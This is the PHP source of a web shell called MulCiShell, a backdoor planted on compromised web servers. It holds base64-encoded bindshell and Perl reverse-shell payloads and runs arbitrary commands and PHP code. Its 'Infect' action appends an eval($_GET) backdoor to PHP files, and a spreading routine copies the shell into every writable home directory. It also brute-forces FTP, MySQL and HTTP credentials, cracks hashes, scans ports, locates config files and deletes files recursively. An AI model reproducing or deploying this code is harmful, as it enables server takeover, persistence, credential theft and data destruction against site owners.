tmp.php

<?php
#/\/\/\/\/\  MulCiShell v0.2 /\/\/\/\/\/\/\#
# Updates from version 1.0#
# 1) Fixed MySQL insert function
# 2) Fixed trailing dirs
# 3) Fixed file-editing when set to 777
# 4) Removed mail function (who needs it?)
# 5) Re-wrote & improved interface
# 6) Added actions to entire directories
# 7) Added config+forum finder
# 8) Added MySQL dump function
# 9) Added DB+table creation, DB drop, table delete, and column+table count
# 10) Updated security-info feature to include more useful details
# 11) _Greatly_ Improved file browsing and handling
# 12) Added banner
# 13) Added DB-Parser and locator
# 14) Added enumeration function
# 15) Added common functions for bypassing security restrictions
# 16) Added bindshell & backconnect (needs testing)
# 17) Improved command execution (alts)
#/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/#
@ini_set("memory_limit","256M");
@set_magic_quotes_runtime(0);
session_start();
ob_start();
$start=microtime();
if(isset($_GET['theme'])) $_SESSION['theme']=$_GET['theme'];
//Thanks korupt ;)
$backdoor_c="DQojaW5jbHVkZSA8YXNtL2lvY3Rscy5oPg0KI2luY2x1ZGUgPHN5cy90aW1lLmg+DQojaW5jbHVkZSA8c3lzL3NlbGVjdC5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN0ZGludC5oPg0KI2luY2x1ZGUgPHB0aHJlYWQuaD4NCg0Kdm9pZCAqQ2xpZW50SGFuZGxlcih2b2lkICpjbGllbnQpDQp7DQoJaW50IGZkID0gKGludCljbGllbnQ7DQoJZHVwMihmZCwgMCk7DQoJZHVwMihmZCwgMSk7DQoJZHVwMihmZCwgMik7DQoJaWYoZm9yaygpID09IDApDQoJCWV4ZWNsKCIvYmluL2Jhc2giLCAicmVzbW9uIiwgMCk7DQoJY2xvc2UoZmQpOw0KCXJldHVybiAwOw0KfQ0KDQppbnQgbWFpbihpbnQgYXJnYywgY2hhciAqYXJndltdKQ0Kew0KCWludCBtc29jaywgY3NvY2ssIGkgPSAxOw0KCXB0aHJlYWRfdCB0aHJlYWQ7DQoJc3RydWN0IHNvY2thZGRyIHNhZGRyOw0KCXN0cnVjdCBzb2NrYWRkcl9pbiBzYWRkckluOw0KICAgIGludCBwb3J0PWF0b2koYXJndlsxXSk7DQoJaWYoKG1zb2NrID0gc29ja2V0KEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBJUFBST1RPX1RDUCkpID09IC0xKQ0KCQlyZXR1cm4gLTE7DQoNCglzYWRkckluLnNpbl9mYW1pbHkJCT0gQUZfSU5FVDsNCglzYWRkckluLnNpbl9hZGRyLnNfYWRkcgk9IElOQUREUl9BTlk7DQoJc2FkZHJJbi5zaW5fcG9ydAkJPSBodG9ucyhwb3J0KTsNCiAgIA0KCW1lbWNweSgmc2FkZHIsICZzYWRkckluLCBzaXplb2Yoc3RydWN0IHNvY2thZGRyX2luKSk7DQoJc2V0c29ja29wdChtc29jaywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAoY2hhciAqKSZpLCBzaXplb2YoaSkpOw0KIA0KCWlmKGJpbmQobXNvY2ssICZzYWRkciwgc2l6ZW9mKHNhZGRyKSkgIT0gMCl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJuIC0xOw0KCX0NCiANCglpZihsaXN0ZW4obXNvY2ssIDEwKSA9PSAtMSl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJuIC0xOw0KCX0NCiANCgl3aGlsZSgxKXsNCgkJaWYoKGNzb2NrID0gYWNjZXB0KG1zb2NrLCBOVUxMLCBOVUxMKSkgIT0gLTEpew0KCQkJcHRocmVhZF9jcmVhdGUoJnRocmVhZCwgMCwgaGFuZGxlciwgKHZvaWQgKiljc29jayk7DQoJCX0NCgl9DQoJDQoJcmV0dXJuIDE7DQp9";
$backconnect_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KbXkgKCRpYWRkciwkcG9ydCwkY21kKT1AQVJHVjsNCm15ICRwYWRkcj1zb2NrYWRkcl9pbigkcG9ydCwgaW5ldF9hdG9uKCRpYWRkcikpOw0KbXkgJHByb3RvID0gZ2V0cHJvdG9ieW5hbWUoInRjcCIpOw0Kc29ja2V0KFNPQ0tFVCwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90byk7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERJTiwiPiZTT0NLRVQiKTsNCnByaW50IFNPQ0tFVCAiU2hlbGwgdGVzdFxuIjsNCnByaW50IGV4ZWMoJGNtZCk7DQpjbG9zZShTVERJTik7DQpjbG9zZShTVERPVVQpOw0K";
$pl_scan="DQoJIyEvdXNyL2Jpbi9wZXJsDQp1c2Ugd2FybmluZ3M7DQp1c2Ugc3RyaWN0Ow0KdXNlIGRpYWdub3N0aWNzOw0KdXNlIElPOjpTb2NrZXQ6OklORVQ7DQpzdWIgdXNhZ2UNCnsNCglkaWUoIiQwIGhvc3Qgc3RhcnRwb3J0IGVuZHBvcnQKIik7DQp9DQp1c2FnZSB1bmxlc3MoQEFSR1Y+MSk7DQpteSgkaG9zdCwkcywkZSk9QEFSR1Y7DQpmb3JlYWNoKCRzLi4kZSkNCnsNCglteSAkc29jaz1JTzo6U29ja2V0OjpJTkVULT5uZXcNCgkoDQoJCVBlZXJBZGRyPT4kaG9zdCwNCgkJUGVlclBvcnQ9PiRfLA0KCQlQcm90bz0+J3RjcCcsDQoJCVRpbWVvdXQ9PjINCgkpOw0KCXByaW50ICJQb3J0ICBvcGVuCiIgaWYgKCRcc29jayk7DQp9DQoNCgk=";
$access_control=0;
$md5_user="MulCiber";
$md5_pass="123";
$user_agent="MulCiber";
$allowed_addrs=array('127.0.0.1');
$shell_email="mulciber-@hotmail.com";
$self=basename($_SERVER['PHP_SELF']);
$addr=$_SERVER['REMOTE_ADDR'];
$serv=@gethostbyname($_SERVER['HTTP_HOST']);
$soft=$_SERVER['SERVER_SOFTWARE'];
$safe_mode=(@ini_get("safe_mode")=='')?"OFF":"ON";
$open_basedir=(@ini_get("open_basedir")=='')?"OFF":"ON";
$uname=@php_uname();
$space=TrueSize(disk_free_space(realpath(getcwd())));
$total=TrueSize(disk_total_space(realpath(getcwd())));
$id=@execmd("id",$disable);
$int_paths=array("mybb","phpbb","phpbb3","forum","forums","board","boards","bb","discuss");
$inc_paths=array("includes","include","inc");
$sql_build_path;
echo "<script type=\"text/javascript\" language=\"javascript\">
function togglecheck() 
{
	var cb=document.forms[0].check
	for (i in cb) 
	{
		cb[i].checked=(cb[i].checked)?false:true;
	}
}
</script>";
switch($access_control) #Break statements intentionally ommited
{
	case 3:
	$ip_allwd=false;
	foreach($allowed_addrs as $addr) 
	{
		if($addr==$_SERVER['REMOTE_ADDR']) {$ip_allwd=true; break;}
		if(!$ip_allwd) exit;
	}
	case 2:
	if(!isset($_SERVER['PHP_AUTH_USER'])||$_SERVER['PHP_AUTH_USER']!=$md5_user||$_SERVER['PHP_AUTH_PW']!=$md5_pass)
	{
			header("WWW-Authenticate: Basic Realm=\"Restricted area\"");
			header("HTTP/1.1 401 Unauthorized");
			echo "Wrong username/password";
			exit;
	}
	case 1:
	if($_SERVER['HTTP_USER_AGENT']!=$user_agent) exit;
}
if($id) 
{
		$s=strpos($id,"(",0)+1;
		$e=strpos($id,")",$s);
		$idval=substr($id,$s,$e-$s);
}
$disable=@ini_get("disable_functions");
if(empty($disable)) $disable="None";
function rm_rep($dir,&$success,&$fail)
{
		@$dh=opendir($dir);
		if(is_resource($dh))
		{
		while((@$rm=readdir($dh)))
		{
			if($rm=='.' || $rm=='..') continue;
			if(is_dir($dir.'/'.$rm)) {echo "Deleting dir $dir/$rm...</br>"; rm_rep($dir.'/'.$rm,$success,$fail); continue;}
			if(@unlink($dir.'/'.$rm)) {$success++;echo "Deleted $rm...</br>";}
			else {$fail++; echo "Failed to delete $rm</br>";}
		}
		@closedir($dh);
	} else echo "Failed to open dir $dir</br>";
}
function chmod_rep($dir,&$success,&$fail,$mod_value)
{
		@$dh=opendir($dir);
		if(is_resource($dh))
		{
		while((@$ch=readdir($dh)))
		{
			if($ch=='.' || $ch=='..') continue;
			if(is_dir($dir.'/'.$ch)) {echo "Changing file modes in dir $dir/$ch...</br>"; chmod_rep($dir.'/'.$ch,$success,$fail,$mod_value); continue;}
			if(@chmod($dir.'/'.$ch,$mod_value)) {$success++;echo "Changed mode for $ch...</br>";}
			else {$fail++; echo "Failed to chmod $rm</br>";}
		}
		@closedir($dh);
	} else echo "Failed to open dir $dir</br>";
}
#Complete these functions
function spread_self($user,&$c=0,$d=0)
{
			if(!$d) $dir="/home/$user/public_html/"; 
			else $dir=$d;
			if(is_dir($dir)&&is_writable($dir))
			{
				copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/mshell.php'); 
				echo "[+] Shell copied to $dir.$f./mshell.php</br>"; 
				$c++;
			}
			if(@$dh=opendir($dir)) echo "[-] Failed to open dir $dir</br>";
			while((@$f=readdir($dh)))
			{
				if($f!="."&&$f!="..")
				{
					if(@is_dir($dir.$f)) 
					{
						echo "[+] Spreading to dir $dir</br>";
						if(@is_writable($dir.$f))
						{
							copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/mshell.php'); 
							echo "[+] Shell copied to $dir.$f./mshell.php</br>"; 
							$c++;
						}
						$c+=spread_self($user,$c,$dir.$f.'/');
					}
				}
			}
}
function copy_rep($dir,&$c)
{

}
function backup_site()
{
	if(!isset($_POST['busite']))
	{
		echo "<center>The following tool will attempt to retrieve every file from the specified dir (including child dirs).</br>If successful, you will be prompted for a site backup download.</br><i>Note: Only readable files will be downloaded. Images and executables will be discarded. This tool should only be used in scenarios in which you have to quickly retrieve a site's source.</i></center>";
	}
}
function infect_rep($dir,&$success,&$fail)
{
}
function copy_dir($dir,$new_dir)
{
}
##################################
function execmd($cmd,$d_functions="None")
{
	if($d_functions=="None") {$ret=passthru($cmd); return $ret;}
	$funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
	$d_functions=str_replace(" ","",$d_functions);
	$dis_funcs=explode(",",$d_functions);
	foreach($funcs as $safe)
	{
		if(!in_array($safe,$dis_funcs)) 
		{
			if($safe=="exec")
			{
				$ret=@exec($cmd);
				$ret=join("\n",$ret);
				return $ret;
			}
			elseif($safe=="system")
			{
				$ret=@system($cmd);
				return $ret;
			}
			elseif($safe=="passthru")
			{
				$ret=@passthru($cmd);
				return $ret;
			}
			elseif($safe=="shell_exec")
			{
				$ret=@shell_exec($cmd);
				return $ret;
			}
			elseif($safe=="popen")
			{
				$ret=@popen("$cmd",'r');
				if(is_resource($ret))
				{
					while(@!feof($ret))
					$read.=@fgets($ret);
					@pclose($ret);
					return $read;
				}
				return -1;
			}
			elseif($safe="proc_open")
			{
				$cmdpipe=array(
				0=>array('pipe','r'),
				1=>array('pipe','w')
				);
				$resource=@proc_open($cmd,$cmdpipe,$pipes);
				if(@is_resource($resource))
				{
					while(@!feof($pipes[1]))
					$ret.=@fgets($pipes[1]);
					@fclose($pipes[1]);
					@proc_close($resource);
					return $ret;
				}
				return -1;
			}
		}
	}
	return -1;
}
$links=array("Enumerate"=>"$self?act=enum","Files"=>"$self?act=files","Domains"=>"$self?act=domains","MySQL"=>"$self?act=sql","Encoder"=>"$self?act=encode",
"Sec. Info"=>"$self?act=sec","Cracker"=>"$self?act=bf",
"Bypassers"=>"$self?act=bypass","Tools"=>"$self?act=tools","Databases"=>"$self?act=dbs","Backdoor Host"=>"$self?act=bh","Back Connect"=>"$self?act=backc","Spread Shell"=>"$self?act=spread","Kill Shell"=>"$self?act=kill");
	echo "<html><head><title>MulCiShell v2.0</title></head>";
	switch($_SESSION['theme'])
	{
		case 'green':
		echo "<style>
			body{color:#66FF00; font-size: 12px; font-family: serif; background-color: black;}
			td {border: 1px solid #00FF00; background-color:#001f00; padding: 2px; font-size: 12px; color: #33FF00;}
			td:hover{background-color: black; color: #33FF00;}
			input{background-color: black; color: #00FF00; border: 1px solid green;}
			input:hover{background-color: #006600;}
			textarea{background-color: black; color: #00FF00; border: 1px solid white;}
			a {text-decoration: none; color: #66FF00; font-weight: bold;}
			a:hover {color: #00FF00;}
			select{background-color: black; color: #00FF00;}
			#main{border-bottom: 1px solid #33FF00; padding: 5px; text-align: center;}
			#main a{padding-right: 15px; color:#00CC00; font-size: 12px; font-family: arial; text-decoration: none; }
			#main a:hover{color: #00FF00; text-decoration: underline;}
			#bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;}
			</style>
			<body>";
		break;
		case 'dark':
			echo "<style>
			body{color: #FFFFFF; font-size: 12px; font-family: serif; background-color: #000000;}
			td {border: 1px solid #FFFFFF; background-color: #000000; padding: 2px; font-size: 12px; color: #FFFFFF;}
			input{background-color: black; color: #FFFFFF;; border: 1px solid #FFFFFF;}
			input:hover{background-color: #000099;}
			textarea{background-color: #000000; color: #FFFFFF; border: 1px solid white;}
			a {text-decoration: none; color: #FFFFFF; font-weight: bold;}
			a:hover {font-weight: bold;}
			select{background-color: #000000; color: #FFFFFF;}
			#main{border-bottom: 1px solid white; padding: 5px; text-align: center;}
			#main a{padding-right: 15px; color:#FFFFFF; font-size: 12px; font-family: arial; text-decoration: none; }
			#main a:hover{font-weight: bold;}
			#bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;}
			</style><body>";
		break;
		default:
			echo "<style>
			body{color: white; font-size: 12px; font-family: arial; scrollbar-base-color:blue; scrollbar-arrow-color:yellow; scrollbar-face-color:blue; }
			td {border: 1px solid #000099; background-color: #000033; padding: 2px; font-size: 12px; color: white; }
			input{background-color: black; color: white; border: 1px solid #000066;}
			input:hover{background-color: #000066; border: 1px solid white;}
			td:hover {color: yellow; background: black;}
			textarea{background-color: #000033; color: white; border: 1px solid white;}
			a {text-decoration: none; color: white; font-weight: bold;}
			a:hover {color: yellow}
			select{background-color: black; color: white;}
			#main{border-bottom: 1px solid #0066FF; padding: 5px; text-align: center;}
			#main a{padding-right: 15px; color: white; font-size: 12px; font-family: arial; text-decoration: none; }
			#main a:hover{color: #0033FF; text-decoration: underline;}
			#bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;}
			</style>
			<body bgcolor='black'>";
			break;
	}
	echo base64_decode("PGNlbnRlcjxpbWcgc3JjPSdodHRwOi8vaW1nNTI5LmltYWdlc2hhY2sudXMvaW1nNTI5LzExNjYv
bWlsY2lzaGVsbGxrNi5wbmcnPjwvY2VudGVyPg==");
echo "<table style='width: inherit; margin: auto; text-align: center;'>
<tr><td>Server IP</td><td>Your IP</td><td>Disk space</td><td>Safe_mode?</td><td>Open_BaseDir?</td><td>System</td><td>Server software</td><td>Disabled functions</td><td>ID</td><td>Shell location</td></tr>
<tr><td>$serv</td><td>$addr</td><td>$space of $total</td><td>$safe_mode</td><td>$open_basedir</td><td>$uname</td><td>$soft</td><td>$disable</td><td>$idval</td><td>".CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF'])."</td></tr>
</table></br>
<div id='main'>";
foreach($links as $val=>$addr) echo "<a href='$addr'>[ $val ]</a>";
echo "</div><br>";
if(isset($_POST['encryption']))
{
	$e=$_POST['encrypt'];
	echo "<form action='$self?' method='post'><center><textarea rows='19' cols='75' readonly>MD5: ".md5($e)."\nSHA1: ".sha1($e)."\nCrypt: ".crypt($e)."\nCRC32: ".crc32($e)."\nBase64 Encoded: ".base64_encode($e)."\nBase64 decoded: ".base64_decode($e)."\nURL encode: ".urlencode($e)."\nURL decode: ".urldecode($e)."\nBin2Hex ".bin2hex($e)."\nDec2Hex: ".dechex($e)."</textarea><br><br>Input: <input type='text' style='width: 300px' name='encrypt'>
	<br><input type='submit' value='Encrypt' name='encryption'></center>";
}
if(isset($_POST['dogetfile']))
execmd("wget $_POST[wgetfile]",$disable);
if(isset($_POST['doUpload']))
{
	$dir=$_POST['u_location'];
	$name=$_FILES['u_file']['name'];
	switch($_FILES['u_file']['error'])
	{
		case 0:
		if(@move_uploaded_file($_FILES['u_file']['tmp_name'],$dir.'/'.$name))
		echo "File uploaded successfully<br>";
		else echo "Failed to upload file!";
	}
}
if(isset($_POST['massfiles']))
{
	$fail=0;
	$success=0;
	switch($_POST['fileaction'])
	{
		case 'Infect': #Nothing special here, just kick them while they're down
		foreach($_POST['files'] as $file)
		{
			$ext=strrchr($file,'.');
			if($ext!=".php") continue;
			@$fh=fopen($file,'a');
			if(@is_resource($fh))
			{
				$success++;
				@fwrite($fh,"<?php @eval(\$_GET['e']) ?>");
				@fclose($fh);
			} else $fail++;
		}
		echo "Successfully infected $success files; failed to infect $fail files</br>Exploit files as such: file.php?e=php code";
		break;
		case 'Delete':
		foreach($_POST['files'] as $file)
		{
			if(is_dir($file)) rm_rep($file,$success,$fail);
			else
			{
				if(@unlink(CleanDir($file)))
				{
					echo "File $file deleted<br>";
					$success++;
				}
				else
				{
					echo "Failed to delete file $file<br>";
					$fail++;
				}
			}
		}
		echo "Total files deleted: $success; failed to delete $fail files<br>";
		break;
		case 'Chmod':
		foreach($_POST['files'] as $file)
		{
			if(is_dir($file)) chmod_rep($file,$success,$fail,$_POST['cmodv']);
			if(@chmod(CleanDir($file),$_POST['cmodv']))
			{
				echo "Changed mode for $file<br>";
				$success++;
			}
			else
			{
				echo "Failed to change mode for $file<br>";
				$fail++;
			}
		}
		echo "Total files modes modified: $success; failed to chmod $fail files<br>";
		break;
	}
}
if(isset($_POST['docrack']))
{
		$con=true;
		$show=0;
		$list=@fopen($_FILES['wordlist']['tmp_name'],'r');
		if(is_resource($list))
		{
			if(isset($_POST['ftpcrack']))
			{
				echo "Bruting $_POST[ftp_user]@$_POST[ftp_host]...</br>";
				if(!empty($_POST['ftp_port'])) $port=$_POST['ftp_port'];
				else $port='3306';
				if(empty($_POST['ftp_timeout'])||!preg_match("/^[0-9]$/",$_POST['ftp_timeout']))
				$time=3;
				else $time=$_POST['ftp_timeout'];
				@$ftp=ftp_connect($_POST['ftp_host'],$port,$time);
				if(!$ftp) $con=false;
				if($con)
				{
					$show++;
					while(!feof($list))
					{
						@$pass=fgets($list);
						if(ftp_login($ftp,$_POST['ftp_user'],trim($pass)))
						{
							echo "Password found! Password for $_POST[ftp_user] is $pass<br>";
							@ftp_close($ftp);
							break;
						}
						if($show==10000){echo "Trying pass $pass...</br>"; $show=0;}
					}
				} else echo "Failed to connect!</br>";
			} 
			elseif(isset($_POST['remote_login']))
			{
				//if(!function_exists("jitghjytiojho")) die("cURL support has to be enabled.");
				/*
				$ch=curl_init($_POST['remote_login_target']);
				curl_setopt($ch,CURLOPT_HEADER,0);
				curl_setopt($ch,CURLOPT_POST,1);
				curl_setopt($ch,CURLOPT_POSTFIELDS,'');
				curl_exec($ch);
				*/
				if(preg_match("/^http:\/\/+/",$_POST['remote_login_target'])) die("Do not include http:// in the target URL.");
				$path=explode('/',$_POST['remote_login_target']);
				$site=$path[0];
				for($i=1;$i<count($path);$i++) $full_path.='/'.$path[$i];
				
			}
			elseif(isset($_POST['vbcrack']))
			{
				if(empty($_POST['vbhash']) OR empty($_POST['vbsalt'])) die("Please specify a hash and salt");
				while(!feof($list))
				{
					$show++;
					$pass=trim(fgets($list));
					$vbenc=md5(md5($pass).$_POST['vbsalt']);
					if($vbenc===$_POST['vbhash'])
					{
						echo "Password for $_POST[vbhash] found! is $pass</br>";
						break;
					}
					if($show===10000)
					{
						$show=0;
						echo "Trying pass $pass...</br>";
					}
				}
				echo "Complete</br>";
			}
			elseif(isset($_POST['mysqlcrack']))
			{
				$host=$_POST['mysql_host'];
				$user=$_POST['mysql_user'];
				if(!empty($_POST['mysql_port']))  $host.=":$_POST[mysql_port]";
					while(!feof($list))
					{
						$show++;
						$pass=trim(fgets($list));
						if(@mysql_connect($host,$user,$pass))
						{
							echo "Password found! Password for $user is $pass</br>";
							break;
						}
						if($show==10000)
						{
							echo "Trying $pass...</br>";
							$show=0;
							continue;
						}
					}
			} 
			elseif(isset($_POST['authcrack']))
			{
				$arr=explode('/',$_POST['auth_url']);
				$con_url=$arr[0];
				if(empty($_POST['auth_url'])) die("Enter a target first...");
				for($i=1;$i<count($arr);$i++) $path.='/'.$arr[$i]; 
				if(preg_match("/^http:\/\/+/",$_POST['auth_url'])) die("Do not include http:// in the url");
				while(!feof($list))
				{
						if(is_resource($conn_url=fsockopen($con_url,80,$errno,$errstr,5)))
						{
							$show++;
							$pass=trim(fgets($list));
							if($show>5000) {$show=0; echo $pass;}
							$encode=base64_encode(trim($_POST['auth_user']).':'.$pass);
							$header="GET $path HTTP/1.1\r\n";
							$header.="Host: $con_url\r\n";
							$header.="Authorization: Basic $encode\r\n";
							$header.="Connection: Close\r\n\r\n";
							fputs($conn_url,$header,strlen($header));
							$tmp++;
							while(!feof($conn_url)) 
							{
								$tmp=fgets($conn_url);
								if(preg_match("/HTTP\/\d+\.\d+ 200+/",$tmp))
								{
									echo "Password found! Password=$pass</br></br>";
									break 2;
								}
							}
						}
				}
				echo "Done</br>";
			}
			elseif(isset($_POST['md5crack']))
			{
				if(empty($_POST['md5hash'])) die("Enter a hash before attempting to crack one ;)");
				$md5=trim($_POST['md5hash']);
				while(!feof($list))
				{
					$show++;
					$pass=trim(fgets($list));
					if(md5($pass)===$md5)
					{
						echo "Password found! Plaintext for $md5 is $pass</br>";
						break;
					}
					if($show==10000)
					{
						echo "Trying $pass...</br>";
						$show=0;
						continue;
					}
			     }
		    }
			elseif(isset($_POST['sha1crack']))
			{
				if(empty($_POST['sha1hash'])) die("Enter a hash before attempting to crack one ;)");
				$sha1=trim($_POST['sha1hash']);
				while(!feof($list))
				{
					$show++;
					$pass=trim(fgets($list));
					if(sha1($pass)===$sha1)
					{
						echo "Password found! Plaintext for $sha1 is $pass</br>";
						break;
					}
					if($show==10000)
					{
						echo "Trying $pass...</br>";
						$show=0;
						continue;
					}
			     }
			}
		}
		@fclose($list);
}
if(isset($_POST['port_scan']))
{
	switch($_POST['type'])
	{
		case 'php':
			extract($_POST);
			while($sport<=$eport)
			{
				echo "Trying port $sport";
				if(@fsockopen($host,$sport,$errno,$errstr,2)) echo "Port $sport open</br>";
				$sport++;
			}
		break;
		default:
			echo "Invalid request</br>";
	}
}
if(isset($_POST['find_forums']))
{
	echo "<center><b>[ Forum locator ]</b></center></br></br>";
	$found=0;
	global $int_paths;
	@$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!");
	while(!feof($fp))
	{
		@list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp));
		$path="/home/$user/public_html";
		if(@is_dir($path))
		{
			foreach($int_paths as $forum_path)
			{
				$full_path=$path."/$forum_path/";
				if(@is_dir($full_path))
				{
					echo "[+] Forum found: Path: $full_path</br>";
					$found++;
					continue;
				}
			}
		} 
	}
	echo "Scan complete. Found $found forums</br></br>";
}
function find_configs($path,&$found)
{
		if(@file_exists($path.'config.php'))
		{
			echo "Found config file: $path"."config.php</br>";
			$found++;
		}
		@$dh=opendir($path);
		while((@$file=readdir($dh)))
		if(is_dir($file)&&$file!='.'&&$file!='..') find_configs($path.$file.'/',$found);
		@closedir($dh);
}
if(isset($_POST['find_configs']))
{
	$found=0;
	echo "<center><b>[ Config locator ]</b></center></br></br>";
	@$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!");
	while(!feof($fp))
	{
		@list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp));
		$path="/home/$user/public_html/";
		find_configs($path,$found);
	}
	@fclose($fp);
	echo "Scan complete. Found $found configs</br></br>";
}
if(isset($_POST['execmd']))
{echo "<center><textarea rows='10' cols='100'>";
echo execmd($_POST['cmd'],$disable);
echo "</textarea></center>";}
if(isset($_POST['execphp']))
{echo "<center><textarea rows='10' cols='100'>";
echo eval(stripslashes($_POST['phpcode']));
echo "</textarea></center>";}
if(isset($_POST['cnewfile']))
{
	if(@fopen($_POST['newfile'],'w')) echo "File created<br>";
	else echo "Failed to create file<br>";
}
if(isset($_POST['cnewdir']))
{
	if(@mkdir($_POST['newdir'])) echo "Directory created<br>";
	else echo "Failed to create directory<br>";
}
if(isset($_POST['doeditfile'])) FileEditor();
switch($_GET['act'])
{
	case 'backc':
	if(!isset($_POST['backconnip']))
	{
		echo "<center><form action='$self?act=backc' method='post'>
		Address: <input type='text' value='$_SERVER[REMOTE_ADDR]' name='backconnip'>
		Port: <input type='text' value='1337' name='backconnport'>
		<input type='submit' value='Connect'></br></br>
		Listen with netcat by executing 'nc -l -n -v -p 1337'</br></br>
		<b>Note: Be sure to foward your port first</b>
		</form></center>";
	} else {
		if(empty($_POST['backconnport'])||empty($_POST['backconnip'])) die("Specify a host/port");
		if(is_writable("."))
		{
			@$fh=fopen(getcwd()."/bc.pl",'w');
			@fwrite($fh,base64_decode($backconnect_perl));
			@fclose($fh);
			echo "Attempting to connect...</br>";
			execmd("perl ".getcwd()."/bc.pl $_POST[backconnip] $_POST[backconnport]",$disable);
			if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FF0000'>Warning: Failed to delete reverse-connection program</font></br>";
			} else {
				@$fh=fopen("/tmp/bc.pl","w");
				@fwrite($fh,base64_decode($backconnect_perl));
				@fclose($fh);
				echo "Attempting to connect...</br>";
				if(!@unlink("/tmp/bc.pl")) echo "<font color='#FF0000'><h2>Warning: Failed to delete reverse-connection program<</h2>/font></br>";
		}
	}
	break;
	case 'dbs': database_tools(); break;
	case 'sql': SQLLogin(); break;
	case 'sqledit': SQLEditor(); break;
	case 'download': SQLDownload(); break;
	case 'tools': show_tools(); break;
	case 'logout': $_SESSION=array(); session_destroy(); echo "Logged out from MySQL.<br>"; break;
	case 'f': FileEditor(); break;
	case 'encode':Encoder(); break;
	case 'bypass':security_bypass(); break;
	case 'bf':brute_force(); break;
	case 'bh': BackDoor(); break; 
	case 'spread':
	if(!isset($_POST['spread_shell']))
	{
		echo "<center><form action='?act=spread' method='post'>
		This tool will attempt to copy the shell into every writable directory on the server, in order to allow access maintaining.</br>
		Passwd file: <input type='text' value='/etc/passwd' name='passwd_file'></br>
		<input type='submit' value='Spread' name='spread_shell'>
		</form></center>";
	} else {
		$s=0;
		@$file=fopen($_POST['passwd_file'],'r');
		if(is_resource($file))
		{
			while(!feof($file))
			{
				@list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($file));
				spread_self($user,$s);
			}
			@fclose($file);
		}
		echo ($s>0)?"Spread complete. Successfully managed to spread the shell $s times</br>":"Failed to spread the shell.</br>";
	}
	break;
	case 'domains':
	$header="GET /search/reverse-ip-domain.php?q=$_SERVER[HTTP_HOST] HTTP/1.0\r\n";
	$header.="Host: searchy.protecus.de\r\n";
	$header.="Connection: Close\r\n\r\n";
	$domain_handle=fsockopen("searchy.protecus.de",80);
	@fputs($domain_handle,$header,strlen($header));
	while(@!feof($domain_handle))
	{
		echo fgets($domain_handle);
	} 
	break;
	case 'kill':
	if(!isset($_POST['justkill']))
	{
		echo "<center>Do you *really* want to kill the shell?<br><br><form action='$self?act=kill' method='post'>
		<input type='submit' value='Yes' name='justkill'></center>";
	} else {
		if(@unlink(basename($_SERVER['PHP_SELF']))) echo "Shell deleted.<br>";
		else echo "Failed to delete shell<br>";
	}
	break;
	case 'sec':
	$mysql_on=function_exists("mysql_connect")?"ON":"OFF";
	$curl_on=function_exists("curl_init")?"ON":"OFF";
	$magic_quotes_on=get_magic_quotes_gpc()?"ON":"OFF";
	$register_globals_on=(@ini_get('register_globals')=='')?"OFF":"ON";
	$include_on=(@ini_get('allow_url_include')=='')?"Disabled":"Enabled";
	$etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
	$ver=phpversion();
	echo "<center>Security overview</center><table style='margin: auto;'><tr><td>PHP Version</td><td>Safe mode</td><td>Open_Basedir</td><td>Magic_Quotes</td><td>Register globals</td><td>
	Remote includes</td><td>Read /etc/passwd?</td><td>MySQL</td><td>cURL</td></tr>
	<tr><td>$ver</td><td>$safe_mode</td><td>$open_basedir</td><td>$magic_quotes_on</td><td>$register_globals_on</td><td>$include_on</td>
	<td>$etc_passwd</td><td>$mysql_on</td><td>$curl_on</td>
	</tr>";
	"</table>";
	break;
	case 'enum':
	$windows=0;
	$path=CleanDir(getcwd());
	if(!eregi("Linux",php_uname())) {$windows=1;}
	if(!$windows)
	{
		$spath=str_replace("/home/","$serv/~",$path);
		$spath=str_replace("/public_html/","/",$spath);
		$URL="http://$spath/".basename($_SERVER['PHP_SELF']);
		echo "Enumerated shell link: <a href='$URL'>$URL</a>";
	} else echo "Enumeration failed<br>";
	break;
}
echo "<br>";
if(isset($_POST['sqlquery']))
{
	extract($_SESSION);
	$conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
	if($conn)
	{
		if(isset($_POST['db'])) @mysql_select_db($_POST['db']);
		$post_query=@mysql_query(stripslashes($_POST['sqlquery'])) or die(mysql_error());
		$affected=@mysql_num_rows($post_query);
		echo "Affected rows: $affected<br>";
	}
}
$dirs=array();
$files=array();
